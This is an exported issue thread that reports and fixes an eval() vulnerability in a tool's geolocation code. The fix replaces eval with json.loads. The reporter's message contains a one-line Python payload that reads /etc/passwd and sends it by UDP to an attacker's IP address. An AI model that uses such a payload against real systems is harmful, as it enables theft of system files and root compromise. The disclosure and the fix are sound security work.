Security vulnerability using eval()

[GoogleCodeExporter]

I have emailed the following to the developer to give additional time to fix 
the problem but I am posting it here as well so that other people can be warned 
of the security vulnerability and upgrade their software when a patch is made 
available.
----

The line of code at core/tracker_core.py line 43 introduces a
vulnerability into fern allowing people to hijack your connection to
Google's servers and respond with a payload to give access to a system.

For example, they might reply with the data:

__import__('socket').socket(__import__('socket').AF_INET,__import__('s
ocket').SOCK_DGRAM).sendto(open('/etc/passwd').read(),
('123.123.123.123', 15000))

This would cause the contents of /etc/passwd to be sent in a UDP packet
to a computer run by the attacker. Other options are possible and
because the tool is run often run as root, the attacker is given full
root access.

Passing an empty dictionary to eval as you do with self.save_eval is not
an effective means to stop the exploit.

Finally, on my last attempt, using the /loc/json page on Google's
servers failed. However, I suspect that you are attempting to parse the
JSON data by using eval(). You can import json to do this without
allowing code execution.

Original issue reported on code.google.com by aj0020...@gmail.com on 31 Dec 2012 at 12:48

[GoogleCodeExporter]

This security bug has been fixed.

Changed from:
geo_data = eval(data_.read(),self.safe_eval)

To:
geo_data = json.loads(data_.read())

Update to 1.83 to get the fix

Thanks AJ0020 :)

Original comment by savioboy...@gmail.com on 3 Jan 2013 at 10:13